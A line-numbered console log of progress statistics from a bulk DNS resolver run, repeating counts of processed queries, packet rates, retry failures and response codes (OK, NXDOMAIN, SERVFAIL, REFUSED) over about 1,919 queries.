1164Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.21%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1165Response: | Success: | Total:
1166OK: | 1652 ( 86.13%) | 1957 ( 62.93%)
1167NXDOMAIN: | 216 ( 11.26%) | 233 ( 7.49%)
1168SERVFAIL: | 50 ( 2.61%) | 60 ( 1.93%)
1169REFUSED: | 0 ( 0.00%) | 860 ( 27.65%)
1170FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1171
1172
1173
1174Processed queries: 1919
1175Received packets: 3151
1176Progress: 100.00% (00 h 00 min 07 sec / 00 h 00 min 07 sec)
1177Current incoming rate: 17 pps, average: 449 pps
1178Current success rate: 0 pps, average: 273 pps
1179Finished total: 1918, success: 1918 (100.00%)
1180Mismatched domains: 450 (14.39%), IDs: 0 (0.00%)
1181Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.05%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1182Response: | Success: | Total:
1183OK: | 1652 ( 86.13%) | 1974 ( 63.11%)
1184NXDOMAIN: | 216 ( 11.26%) | 233 ( 7.45%)
1185SERVFAIL: | 50 ( 2.61%) | 60 ( 1.92%)
1186REFUSED: | 0 ( 0.00%) | 861 ( 27.53%)
1187FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1188
1189
1190
1191Processed queries: 1919
1192Received packets: 3154
1193Progress: 100.00% (00 h 00 min 08 sec / 00 h 00 min 08 sec)
1194Current incoming rate: 2 pps, average: 393 pps
1195Current success rate: 0 pps, average: 239 pps
1196Finished total: 1918, success: 1918 (100.00%)
1197Mismatched domains: 453 (14.47%), IDs: 0 (0.00%)
1198Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.05%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1199Response: | Success: | Total:
1200OK: | 1652 ( 86.13%) | 1976 ( 63.11%)
1201NXDOMAIN: | 216 ( 11.26%) | 233 ( 7.44%)
1202SERVFAIL: | 50 ( 2.61%) | 60 ( 1.92%)
1203REFUSED: | 0 ( 0.00%) | 862 ( 27.53%)
1204FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1205
1206
1207
1208Processed queries: 1919
1209Received packets: 3156
1210Progress: 100.00% (00 h 00 min 09 sec / 00 h 00 min 09 sec)
1211Current incoming rate: 1 pps, average: 350 pps
1212Current success rate: 0 pps, average: 212 pps
1213Finished total: 1918, success: 1918 (100.00%)
1214Mismatched domains: 455 (14.52%), IDs: 0 (0.00%)
1215Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.05%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1216Response: | Success: | Total:
1217OK: | 1652 ( 86.13%) | 1976 ( 63.07%)
1218NXDOMAIN: | 216 ( 11.26%) | 233 ( 7.44%)
1219SERVFAIL: | 50 ( 2.61%) | 60 ( 1.92%)
1220REFUSED: | 0 ( 0.00%) | 864 ( 27.58%)
1221FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1222
1223
1224
1225Processed queries: 1919
1226Received packets: 3159
1227Progress: 100.00% (00 h 00 min 10 sec / 00 h 00 min 10 sec)
1228Current incoming rate: 2 pps, average: 315 pps
1229Current success rate: 0 pps, average: 191 pps
1230Finished total: 1918, success: 1918 (100.00%)
1231Mismatched domains: 458 (14.60%), IDs: 0 (0.00%)
1232Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.05%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1233Response: | Success: | Total:
1234OK: | 1652 ( 86.13%) | 1976 ( 63.01%)
1235NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.46%)
1236SERVFAIL: | 50 ( 2.61%) | 60 ( 1.91%)
1237REFUSED: | 0 ( 0.00%) | 866 ( 27.61%)
1238FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1239
1240
1241
1242Processed queries: 1919
1243Received packets: 3165
1244Progress: 100.00% (00 h 00 min 11 sec / 00 h 00 min 11 sec)
1245Current incoming rate: 5 pps, average: 287 pps
1246Current success rate: 0 pps, average: 174 pps
1247Finished total: 1918, success: 1918 (100.00%)
1248Mismatched domains: 464 (14.77%), IDs: 0 (0.00%)
1249Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.05%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1250Response: | Success: | Total:
1251OK: | 1652 ( 86.13%) | 1976 ( 62.89%)
1252NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.45%)
1253SERVFAIL: | 50 ( 2.61%) | 64 ( 2.04%)
1254REFUSED: | 0 ( 0.00%) | 867 ( 27.59%)
1255FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1256
1257
1258
1259Processed queries: 1919
1260Received packets: 3168
1261Progress: 100.00% (00 h 00 min 12 sec / 00 h 00 min 12 sec)
1262Current incoming rate: 2 pps, average: 263 pps
1263Current success rate: 0 pps, average: 159 pps
1264Finished total: 1918, success: 1918 (100.00%)
1265Mismatched domains: 467 (14.85%), IDs: 0 (0.00%)
1266Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.05%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1267Response: | Success: | Total:
1268OK: | 1652 ( 86.13%) | 1976 ( 62.83%)
1269NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.44%)
1270SERVFAIL: | 50 ( 2.61%) | 66 ( 2.10%)
1271REFUSED: | 0 ( 0.00%) | 868 ( 27.60%)
1272FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1273
1274
1275
1276Processed queries: 1919
1277Received packets: 3171
1278Progress: 100.00% (00 h 00 min 13 sec / 00 h 00 min 13 sec)
1279Current incoming rate: 2 pps, average: 243 pps
1280Current success rate: 0 pps, average: 147 pps
1281Finished total: 1918, success: 1918 (100.00%)
1282Mismatched domains: 470 (14.93%), IDs: 0 (0.00%)
1283Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.05%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1284Response: | Success: | Total:
1285OK: | 1652 ( 86.13%) | 1976 ( 62.77%)
1286NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.43%)
1287SERVFAIL: | 50 ( 2.61%) | 67 ( 2.13%)
1288REFUSED: | 0 ( 0.00%) | 870 ( 27.64%)
1289FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1290
1291
1292
1293Processed queries: 1919
1294Received packets: 3173
1295Progress: 100.00% (00 h 00 min 14 sec / 00 h 00 min 14 sec)
1296Current incoming rate: 1 pps, average: 226 pps
1297Current success rate: 0 pps, average: 136 pps
1298Finished total: 1918, success: 1918 (100.00%)
1299Mismatched domains: 472 (14.98%), IDs: 0 (0.00%)
1300Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.05%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1301Response: | Success: | Total:
1302OK: | 1652 ( 86.13%) | 1976 ( 62.73%)
1303NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.43%)
1304SERVFAIL: | 50 ( 2.61%) | 67 ( 2.13%)
1305REFUSED: | 0 ( 0.00%) | 871 ( 27.65%)
1306FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1307
1308
1309
1310Processed queries: 1919
1311Received packets: 3175
1312Progress: 100.00% (00 h 00 min 15 sec / 00 h 00 min 15 sec)
1313Current incoming rate: 1 pps, average: 211 pps
1314Current success rate: 0 pps, average: 127 pps
1315Finished total: 1918, success: 1918 (100.00%)
1316Mismatched domains: 474 (15.04%), IDs: 0 (0.00%)
1317Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.05%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1318Response: | Success: | Total:
1319OK: | 1652 ( 86.13%) | 1976 ( 62.69%)
1320NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.42%)
1321SERVFAIL: | 50 ( 2.61%) | 68 ( 2.16%)
1322REFUSED: | 0 ( 0.00%) | 872 ( 27.66%)
1323FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1324
1325
1326
1327Processed queries: 1919
1328Received packets: 3179
1329Progress: 100.00% (00 h 00 min 16 sec / 00 h 00 min 16 sec)
1330Current incoming rate: 3 pps, average: 198 pps
1331Current success rate: 0 pps, average: 119 pps
1332Finished total: 1918, success: 1918 (100.00%)
1333Mismatched domains: 478 (15.15%), IDs: 0 (0.00%)
1334Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.05%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1335Response: | Success: | Total:
1336OK: | 1652 ( 86.13%) | 1978 ( 62.67%)
1337NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.41%)
1338SERVFAIL: | 50 ( 2.61%) | 68 ( 2.15%)
1339REFUSED: | 0 ( 0.00%) | 874 ( 27.69%)
1340FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1341
1342
1343
1344Processed queries: 1919
1345Received packets: 3182
1346Progress: 100.00% (00 h 00 min 17 sec / 00 h 00 min 17 sec)
1347Current incoming rate: 2 pps, average: 186 pps
1348Current success rate: 0 pps, average: 112 pps
1349Finished total: 1918, success: 1918 (100.00%)
1350Mismatched domains: 481 (15.23%), IDs: 0 (0.00%)
1351Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.05%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1352Response: | Success: | Total:
1353OK: | 1652 ( 86.13%) | 1978 ( 62.61%)
1354NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.41%)
1355SERVFAIL: | 50 ( 2.61%) | 69 ( 2.18%)
1356REFUSED: | 0 ( 0.00%) | 875 ( 27.70%)
1357FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1358
1359
1360
1361Processed queries: 1919
1362Received packets: 3183
1363Progress: 100.00% (00 h 00 min 18 sec / 00 h 00 min 18 sec)
1364Current incoming rate: 0 pps, average: 176 pps
1365Current success rate: 0 pps, average: 106 pps
1366Finished total: 1918, success: 1918 (100.00%)
1367Mismatched domains: 482 (15.25%), IDs: 0 (0.00%)
1368Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.05%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1369Response: | Success: | Total:
1370OK: | 1652 ( 86.13%) | 1978 ( 62.59%)
1371NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.41%)
1372SERVFAIL: | 50 ( 2.61%) | 69 ( 2.18%)
1373REFUSED: | 0 ( 0.00%) | 876 ( 27.72%)
1374FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1375
1376
1377
1378Processed queries: 1919
1379Received packets: 3184
1380Progress: 100.00% (00 h 00 min 19 sec / 00 h 00 min 19 sec)
1381Current incoming rate: 0 pps, average: 167 pps
1382Current success rate: 0 pps, average: 100 pps
1383Finished total: 1918, success: 1918 (100.00%)
1384Mismatched domains: 483 (15.28%), IDs: 0 (0.00%)
1385Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.05%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1386Response: | Success: | Total:
1387OK: | 1652 ( 86.13%) | 1978 ( 62.58%)
1388NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.40%)
1389SERVFAIL: | 50 ( 2.61%) | 69 ( 2.18%)
1390REFUSED: | 0 ( 0.00%) | 877 ( 27.74%)
1391FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1392
1393
1394
1395Processed queries: 1919
1396Received packets: 3187
1397Progress: 100.00% (00 h 00 min 20 sec / 00 h 00 min 20 sec)
1398Current incoming rate: 2 pps, average: 159 pps
1399Current success rate: 0 pps, average: 95 pps
1400Finished total: 1918, success: 1918 (100.00%)
1401Mismatched domains: 486 (15.36%), IDs: 0 (0.00%)
1402Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.05%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1403Response: | Success: | Total:
1404OK: | 1652 ( 86.13%) | 1978 ( 62.52%)
1405NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.40%)
1406SERVFAIL: | 50 ( 2.61%) | 72 ( 2.28%)
1407REFUSED: | 0 ( 0.00%) | 877 ( 27.72%)
1408FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1409
1410
1411
1412Processed queries: 1919
1413Received packets: 3189
1414Progress: 100.00% (00 h 00 min 21 sec / 00 h 00 min 21 sec)
1415Current incoming rate: 1 pps, average: 151 pps
1416Current success rate: 0 pps, average: 91 pps
1417Finished total: 1918, success: 1918 (100.00%)
1418Mismatched domains: 488 (15.41%), IDs: 0 (0.00%)
1419Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.05%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1420Response: | Success: | Total:
1421OK: | 1652 ( 86.13%) | 1978 ( 62.48%)
1422NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.39%)
1423SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1424REFUSED: | 0 ( 0.00%) | 879 ( 27.76%)
1425FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1426
1427
1428
1429Processed queries: 1919
1430Received packets: 3190
1431Progress: 100.00% (00 h 00 min 22 sec / 00 h 00 min 22 sec)
1432Current incoming rate: 0 pps, average: 144 pps
1433Current success rate: 0 pps, average: 87 pps
1434Finished total: 1918, success: 1918 (100.00%)
1435Mismatched domains: 489 (15.44%), IDs: 0 (0.00%)
1436Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.05%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1437Response: | Success: | Total:
1438OK: | 1652 ( 86.13%) | 1978 ( 62.46%)
1439NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.39%)
1440SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1441REFUSED: | 0 ( 0.00%) | 880 ( 27.79%)
1442FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1443
1444
1445
1446Processed queries: 1919
1447Received packets: 3195
1448Progress: 100.00% (00 h 00 min 23 sec / 00 h 00 min 23 sec)
1449Current incoming rate: 4 pps, average: 138 pps
1450Current success rate: 0 pps, average: 83 pps
1451Finished total: 1918, success: 1918 (100.00%)
1452Mismatched domains: 494 (15.57%), IDs: 0 (0.00%)
1453Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.05%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1454Response: | Success: | Total:
1455OK: | 1652 ( 86.13%) | 1979 ( 62.39%)
1456NXDOMAIN: | 216 ( 11.26%) | 236 ( 7.44%)
1457SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1458REFUSED: | 0 ( 0.00%) | 882 ( 27.81%)
1459FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1460
1461
1462
1463Processed queries: 1919
1464Received packets: 3199
1465Progress: 100.00% (00 h 00 min 24 sec / 00 h 00 min 24 sec)
1466Current incoming rate: 3 pps, average: 133 pps
1467Current success rate: 0 pps, average: 79 pps
1468Finished total: 1918, success: 1918 (100.00%)
1469Mismatched domains: 498 (15.68%), IDs: 0 (0.00%)
